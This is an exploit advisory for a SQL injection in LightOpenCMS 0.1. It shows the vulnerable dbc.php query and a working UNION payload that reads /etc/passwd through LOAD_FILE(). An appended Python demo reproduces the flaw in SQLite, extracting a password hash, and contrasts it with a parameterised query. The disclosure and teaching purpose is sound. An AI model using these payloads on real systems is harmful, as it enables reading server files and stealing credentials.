******** Salvatore "drosophila" Fresta ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

The id parameter is concatenated into the query unescaped, so an
unauthenticated visitor (guest) can inject arbitrary SQL statements.
With magic_quotes_gpc = off the single quote reaches MySQL intact and
closes the string literal around the id value; with it on, the quote
would arrive as \' and this particular payload would fail.

...
if (isset($_GET['id'])) {
    $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
    return mysql_fetch_assoc($result);
...

***************************************************

[+] Code

- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23

(The UNION supplies four columns to match the pages table; %23 is a
URL-encoded '#', which comments out the trailing quote of the original
query.)

***************************************************

[+] Fix

No fix.

***************************************************

--
Salvatore Fresta aka drosophila
CWNP444351
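The following is an added example, not code from the advisory or from LightOpenCMS. It reproduces the dbc.php pattern against an in-memory SQLite database (MySQL is the real target) to show how the UNION payload escapes the quoted id literal, and sets the parameterised form beside it. Assumptions: the pages and users tables, their rows and column layout are constructed here; because SQLite has neither LOAD_FILE() nor '#' comments, the stand-in payload reads a hash from the constructed users table and ends with '--' instead of '#'.

```python
import sqlite3

# Constructed sample schema standing in for the LightOpenCMS `pages` table
# (four columns, matching the four-column UNION in the advisory's payload)
# plus a `users` table used as the injection target in place of LOAD_FILE().
SCHEMA = """
CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO pages VALUES (1, 'Home', 'Welcome', 'admin');
CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def open_db():
    """Create the constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_vulnerable_sql(page_id):
    """Same string concatenation as dbc.php: input becomes part of the SQL."""
    return "SELECT * FROM pages WHERE id='" + page_id + "'"


def vulnerable_lookup(conn, page_id):
    """Mirror of the advisory's vulnerable query (first row, like mysql_fetch_assoc)."""
    return conn.execute(build_vulnerable_sql(page_id)).fetchone()


def safe_lookup(conn, page_id):
    """Parameterised form: the driver binds page_id as a value, never as SQL text."""
    return conn.execute("SELECT * FROM pages WHERE id=?", (page_id,)).fetchone()


# SQLite adaptation of the advisory's payload (assumption, see lead-in):
#   -1'            closes the id string literal
#   UNION ALL ...  appends attacker-chosen rows with the same column count
#   --             comments out the trailing quote the PHP code appends
PAYLOAD = "-1' UNION ALL SELECT 1,2,password_hash,4 FROM users--"


if __name__ == "__main__":
    db = open_db()
    print("query sent to the database:", build_vulnerable_sql(PAYLOAD))
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))
    print("parameterised:", safe_lookup(db, PAYLOAD))
```

Run as-is, the vulnerable path returns a row whose third column is the admin password hash, while the parameterised query treats the whole payload as a (non-matching) id value and returns nothing; a benign id of "1" returns the Home page through both paths. The fix the advisory lacks is exactly that second form (prepared statements, or at minimum mysql_real_escape_string() plus a numeric cast on id).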